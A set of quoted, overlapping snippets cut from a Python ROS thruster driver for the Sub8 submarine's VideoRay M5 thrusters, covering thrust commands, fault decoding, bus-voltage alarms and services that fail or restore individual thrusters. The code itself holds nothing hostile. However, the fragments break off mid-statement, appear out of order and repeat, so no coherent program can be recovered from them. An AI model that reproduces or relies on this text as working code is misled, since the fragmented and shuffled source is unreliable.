"position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If someone else cleared",
"thruster status is bad if thruster_status is None: return message_contents = [ 'rpm',",
"rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster,",
"is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity =",
"all of the sub's thrusters - Gather configuration data and make it available",
"fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault",
"argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for",
"nodes - Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters -",
"As of May 2017, this is just a simple rolling average with a",
"'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self):",
"a simple rolling average with a constant width sliding window. However add_reading and",
"voltages = [] if len(self.buffer) == 0: return None for r in self.buffer:",
"allocation ''' # So that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name)",
"ThrusterPorts, (Either simulated or real), for communicating with thrusters - Track a thrust_dict,",
"it won't come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So",
"rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for",
"to the configuration.json file containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg)",
"the appropriate port - Given a command message, route that command to the",
"self.buffer: age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self):",
"- Given a command message, route that command to the appropriate port/thruster -",
"config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings",
"of thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port:",
"Thruster came online # Don't try to do anything if the thruster status",
"threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage. As of",
"a particular thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info =",
"<< 4): 'STALL', (1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults =",
"configuration.json file containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args =",
"commands These messages contain a list of instructions, one for each thruster If",
"the appropriate port/thruster - Send a thruster status message describing the status of",
"at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names':",
"allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online",
"rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name + ')') effort",
"port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name))",
"< self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity = 5 if",
"thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters going online or offline",
"self.v = voltage self.t = time def __init__(self, window_duration): ''' window_duration - float",
"MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id",
"''' Callback for receiving thrust commands These messages contain a list of instructions,",
"This is only determined by comms self.deactivated_thrusters = set() # These will not",
"if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or",
"target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust",
"offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a a force command (in",
"s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for",
"> self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the window_duration from",
"is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model",
"node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring",
"rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity =",
"0 # volts class VoltageReading(object): def __init__(self, voltage, time): self.v = voltage self.t",
"import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from",
"thrusters to the thruster dict and configure if present for thruster_name in port_info['thruster_names']:",
"lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage.",
"even if comms are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\",",
"interference # Create ThrusterPort objects in a dict indexed by port name self.load_thruster_ports(ports_layout,",
"{name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms",
"status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback",
"thruster_definitions) # Feedback on thrusters (thruster mapper blocks until it can use this",
"port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name",
"self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage, time):",
"just a simple rolling average with a constant width sliding window. However add_reading",
"rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage,",
"and alarm ''' failed_before = {x for x in self.failed_thrusters} for thrust_cmd in",
"<< 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 <<",
"for thrust allocation ''' # So that thrust is not allocated to the",
"a constant width sliding window. However add_reading and get_estimate methods are left for",
"(might not still be true - David) if message_keyword_args['fault'] > 2: fault_codes =",
"nonsense feedback at times) if voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage,",
"if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older",
"+ ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status =",
"Create ThrusterPort objects in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) #",
"**message_keyword_args ) ) # Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'],",
"for code, fault_name in fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster:",
"return def thrust_cb(self, msg): ''' Callback for receiving thrust commands These messages contain",
"Raises or clears the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets",
"= '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout",
"check_alarm_status(self, alarm): # If someone else cleared this alarm, we need to make",
"other nodes - Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters",
"self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration = 30.0",
"thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id,",
"sliding window. However add_reading and get_estimate methods are left for when smarter filtering",
"thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if",
"and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough",
"only determined by comms self.deactivated_thrusters = set() # These will not come back",
"message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort,",
"of instructions, one for each thruster If there are any updates to the",
"simulation, based on parameter '/simulate'\") # Instantiate thruster comms port for port_info in",
"ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in",
"ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports = {} #",
"in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take",
"a named thruster Example names are BLR, FLH, etc. Raises RuntimeError if a",
"to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake",
"thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args )",
"unavailable for thrust allocation ''' # So that thrust is not allocated to",
"ThrusterPort objects in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback",
"track of thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names() for offline in",
"thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with",
"message, route that command to the appropriate port/thruster - Send a thruster status",
"node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a a force",
"class VoltageReading(object): def __init__(self, voltage, time): self.v = voltage self.t = time def",
"self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg =",
"PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg =",
"self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2)",
"this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name,",
"thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity to the",
"self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity =",
"that command to the appropriate port/thruster - Send a thruster status message describing",
"call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects in a dict indexed",
"= rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time",
"AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus",
"def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports =",
"if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity =",
"So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): '''",
"the sub's thrusters - Gather configuration data and make it available to other",
"time has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): '''",
"{}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0",
"to keep a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub =",
"node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def",
"thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters going online",
"can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/'",
"if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be set before launching",
"self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the window_duration",
"Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') +",
"in self.buffer: age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def",
"command to the appropriate port/thruster - Send a thruster status message describing the",
"''' Makes a thruster unavailable for thrust allocation ''' # So that thrust",
"srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) )",
"# Keep track of thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names() for",
"{} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if",
"ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener",
"(amount of seconds for which to keep a reading in the buffer) '''",
"alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster out",
"self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm Updates",
"raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return",
"These alarms require this service to be available before things will work rospy.wait_for_service(\"update_thruster_layout\")",
"self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed in",
"bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s",
"1.0 # s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name() def __init__(self,",
"reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take effect def get_thruster_info(self, srv):",
"import numpy as np import copy import rospy import rospkg import rosparam import",
"if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in",
"are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for receiving thrust commands These",
"# s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout,",
"(' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status",
"So that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that",
"UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects",
"failed_before = {x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust)",
"objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake =",
"np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name +",
"power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and raise alarm",
"is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to",
"the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online even if",
"be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor =",
"severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration",
"bus_voltage < self.kill_voltage: severity = 5 if severity is not None and self.cached_severity",
"== '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\"",
"np import copy import rospy import rospkg import rosparam import threading import argparse",
"in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises",
"self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster ('",
"the severity to the number of failed thrusters (clipped at 5) ''' offline_names",
"not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name",
"to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online even",
"voltage. As of May 2017, this is just a simple rolling average with",
"commanded Raises UnavailableThrusterException if a thruster that is offline is commanded a non-zero",
"= target_port.command_thruster(name, effort) # Keep track of thrusters going online or offline offline_on_port",
"it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name:",
"than the window_duration from buffer ''' for reading in self.buffer: age = rospy.Time.now()",
"name, thrust): ''' Issue a a force command (in Newtons) to a named",
"self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust allocation",
"self.ports = {} # ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort",
"the 'offline_thruster_names' parameter accordingly Sets the severity to the number of failed thrusters",
"objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map = {} # node_id",
"offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline)",
"self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG =",
"rospy.logwarn(\"Running fake thrusters for simulation, based on parameter '/simulate'\") # Instantiate thruster comms",
"thrust ({}) outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in",
"if thruster_status is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault',",
"data and make it available to other nodes - Instantiate ThrusterPorts, (Either simulated",
"for communicating with thrusters - Track a thrust_dict, which maps thruster names to",
"= rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary",
") self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration =",
"= thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to the thruster dict and",
"min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If someone",
"'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in message_contents}",
"offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed in copy.deepcopy(self.failed_thrusters):",
"physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust,",
"__init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all of the sub's",
"'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v']",
"self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if",
"voltage readings to buffer ''' voltage = float(voltage) # Only add if it",
"description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter,",
"based on parameter '/simulate'\") # Instantiate thruster comms port for port_info in ports_layout:",
"= port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to the",
"to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout =",
"to the thruster dict and configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name]",
"firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/'",
"contain a list of instructions, one for each thruster If there are any",
"target_port.command_thruster(name, effort) # Keep track of thrusters going online or offline offline_on_port =",
"5 if severity is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage",
"David) if message_keyword_args['fault'] > 2: fault_codes = { (1 << 0): 'UNDERVOLT', (1",
"at times) if voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer()",
"None: raise IOError('/thruster_layout rosparam needs to be set before launching the thruster driver')",
"window_duration from buffer ''' for reading in self.buffer: age = rospy.Time.now() - reading.t",
"rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort",
"def fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust allocation ''' #",
"= 0 self.buffer = [] def add_reading(self, voltage, time): ''' Adds voltage readings",
"M5's will give nonsense feedback at times) if voltage >= self.VMIN and voltage",
"set() # These will not come back online even if comms are good",
"= { (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2):",
"immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track of thrusters",
"= port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver:",
"'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in message_contents} power",
"@thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a a force command (in Newtons)",
"use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' +",
"B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster '''",
"and get_estimate methods are left for when smarter filtering is needed ''' VMAX",
"list of instructions, one for each thruster If there are any updates to",
"thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class",
"If there are any updates to the list of failed thrusters, it will",
"None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity = 3",
"These messages contain a list of instructions, one for each thruster If there",
"[ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key:",
"power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust,",
"rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all of",
"self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all thrusters ''' for port",
"rosparam import threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header,",
"# Feedback on thrusters (thruster mapper blocks until it can use this service)",
"''' voltage = float(voltage) # Only add if it makes sense (the M5's",
"is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come",
"{} has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return",
"buffer ''' voltages = [] if len(self.buffer) == 0: return None for r",
"bus_voltage < self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity = 5",
"Returns average voltage in buffer ''' voltages = [] if len(self.buffer) == 0:",
"int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items(): if code & fault",
"online even if comms are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\")",
"# Necessary for some settings to take effect def get_thruster_info(self, srv): ''' Get",
"comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return",
"has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes",
"of the configured thrust bounds is commanded Raises UnavailableThrusterException if a thruster that",
"set() # This is only determined by comms self.deactivated_thrusters = set() # These",
"fault_name in fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has",
"status message describing the status of the particular thruster ''' self.failed_thrusters = set()",
"= target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command",
"offline thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately",
"port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust",
"from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv",
"not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0",
"thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all thrusters '''",
"+ '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id)",
"parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class ThrusterDriver(object): _dropped_timeout = 1.0 #",
"threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from",
"(the M5's will give nonsense feedback at times) if voltage >= self.VMIN and",
"list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else:",
"We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep track of",
"ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require this service to",
"appropriate port - Given a command message, route that command to the appropriate",
"constant width sliding window. However add_reading and get_estimate methods are left for when",
"= 3 if bus_voltage < self.kill_voltage: severity = 5 if severity is not",
"a command message, route that command to the appropriate port/thruster - Send a",
"self.buffer = [] def add_reading(self, voltage, time): ''' Adds voltage readings to buffer",
"thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({}) outside of physical",
"0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes",
"self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) #",
"= rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration)",
"'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key] for key in message_contents} power =",
"waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout",
"window_duration): ''' window_duration - float (amount of seconds for which to keep a",
"= rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self,",
"communicating with thrusters - Track a thrust_dict, which maps thruster names to the",
"voltage, time): ''' Adds voltage readings to buffer ''' voltage = float(voltage) #",
"out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity to the number",
"on thrusters (thruster mapper blocks until it can use this service) self.thruster_info_service =",
"for reading in self.buffer: age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION:",
"if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay",
"buffer ''' voltage = float(voltage) # Only add if it makes sense (the",
"necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still be true",
"anything if the thruster status is bad if thruster_status is None: return message_contents",
"UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock()",
